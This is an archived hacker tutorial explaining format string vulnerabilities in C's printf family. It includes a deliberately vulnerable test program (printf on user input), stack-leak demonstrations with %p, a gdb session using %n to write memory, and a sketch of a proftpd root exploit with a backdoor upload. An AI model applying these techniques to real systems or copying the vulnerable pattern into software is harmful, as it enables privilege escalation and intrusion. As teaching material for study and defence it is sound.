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TUCoPS :: General Information :: formatbg.txt

Format Bugs




        Format Bugs: What are they, Where did they come from,......
                    ...How to exploit them
                    
                    by lamagra <lamagra@digibel.org>
                    
-------> What are they

The concept is quite simple: when a *printf() function (eg. printf(char *fmt,...))
is called and fmt is user-supplied. The user can put in formatstrings %s %p %x
in the fmt. *printf will then "convert" them with the supplied arguments.
Problem is *printf() doesn't know where it's arguments stop. When a new 
formatstrings it just reads the next thing on the stack. Lets have a look
at an example.

<++> ptest.c
#include <stdarg.h>

blaat(char *fmt,...)
{
    va_list va;
    int i;
    char *addr;
    
    va_start(va,fmt);

    printf("---| begin |---\n");    
    for(i = 0;i < 5;i++)
    {
        addr = va_arg(va,char *);
        printf("%p\n",addr);
    }
    printf("---|  end  |---\n");
    
    va_end(va);
}

main(int argc,char **argv)
{  
    char buf[8];
    char *prot = (char *)0x12345678;
    
    strncpy(buf,argv[1],8);
    
    blaat(argv[1]);
    printf(argv[1]);
    putchar('\n');
}
<-->

darkstar:/tmp/temp# gcc ptest.c -optest
darkstar:/tmp/temp# ptest blaat
---| begin |---
0x12345678
0x61616c62
0xbfff0074
0xbffffb24
0x804855e
---|  end  |---
blaat

A simple argument makes it print the 5 things on the top of the stack before the
call to blaat(). You can see 0x12345678 which is the content of 'prot' and the
content of buf namely our argument. The output of printf() is just our argument.
Now lets run it again with some formatstrings in the argument, I use %p since it
doesn't crash the program.

darkstar:/tmp/temp# ptest AAAA%p
---| begin |---
0x12345678
0x41414141
0xbf007025
0xbffffb24
0x804855e
---|  end  |---
AAAA0x12345678

Now the output of printf() is quite interesting. It prints 4 times 'A' and the
%p is replaced by the address on top of the stack. When you'd add more %p's to
the argument you'll see every other element on the stack gets printed.

------> How to exploit them?

First thing to do is, check out the other kinds of formatstrings:
%c, %f, %d, %s, %p, %i, %n, etc

%n is probably the most interesting, it writes the number of bytes printed to
the location pointed to by it's argument.

simple example:
int q;
printf("AAAA%n",&q);
q = 4 after that

As we've seen from our previous tests, our argument copied into buf, is on the 
stack aswell. What if we replaced the AAAA with a valid address and then wrote
to that address using %n. Lets see
darkstar:/tmp/temp# gdb --exec=a.out --symbols=ptest
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-slackware-linux"...
(gdb) r
Starting program: /tmp/temp/a.out

Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0x8048090 in ___crt_dummy__ ()
(gdb) break *main+60
Breakpoint 1 at 0x804821c: file ptest.c, line 30.
(gdb) break *main+65
Breakpoint 2 at 0x8048221: file ptest.c, line 30.
(gdb) c
Continuing.
---| begin |---
0x12345678
0xbffffb10
0x6e257025
0xbffffb00
0x80480ee
---|  end  |---

Breakpoint 1, 0x804821c in main (argc=2, argv=0xbffffba0) at ptest.c:30
30          printf(argv[1]);
(gdb) x/wx 0xbffffb10
0xbffffb10:     0x00000000
(gdb) c
Continuing.

Breakpoint 2, 0x8048221 in main (argc=2, argv=0xbffffba0) at ptest.c:30
30          printf(argv[1]);
(gdb) x/wx 0xbffffb10
0xbffffb10:     0x0000000e
(gdb) c
Continuing.
0x12345678

Program exited with code 012.
(gdb) q
darkstar:/tmp/temp#

a.out is a simple program that executes ptest with \x10\xfb\xff\xbf%p%n as 
argument, as you can see %p prints the first address and %n writes to 0xbfffb10.
Pretty neat eh, I think it is.

What can I do with this, you ask. Well you can overwrite anything inside the 
program (except regions mapped PROT_WRITE like .text). This can be many things
In my proftpd exploit I chose for the saved uid and part of the configs in mem.
The daemon relinquishes rootpriviledges for opening a dataconnection 
(on LIST,RETR,etc) after that it changes back to the old uid (saved in mem).
The general idea was to zero that uid, open a dataconnection and up with root
priviledges inside proftpd. With local access this is enough, you upload a backdoor
and CHMOD 4755 (-rwsr-xr-x) proftp allows suidsgid flags unlike wuftpd. 
But with anonymous access, you couldn't write to disk because of the configuration.
Simple thing to do is, corrupt the configuration. In this case corrupt the 'DenyAll'
setting.
Other things to do are eg. change the last byte of a stackpointer, data in memory.
and lots more.

An interesting thing in the new glibc version is that for example %<long number>d
works even with snprintf(), on older glibc's it just crashes. 

*- note -*
"%.5d",5 outputs 00005
"%.200000d" outputs 200000 bytes
*- note -*

With this advantage you could also change <saved %eip>, function pointers,
jmp_buf's etc etc

All this is very nice, but it can get really hard sometimes. Some sort of
userdefined string has to be somewhere on the stack when the function is called.
This requires some fiddling and some stackbacktracing. Sometimes you have to go
back a few functions before a buffer is in reach. 
Conclusion: these bugs are big, sometimes....

This concludes this small introduction into format bugs. If you want to play
some more with this kind of bugs, fiddle a bit with the ptest program. 
And maybe try exploiting the ftp program on bsd, linux, windows... it has this
sort of hole in the QUOTE command. This isn't a big thing but nice to play with.

------> The end 
http://lamagra.seKure.de


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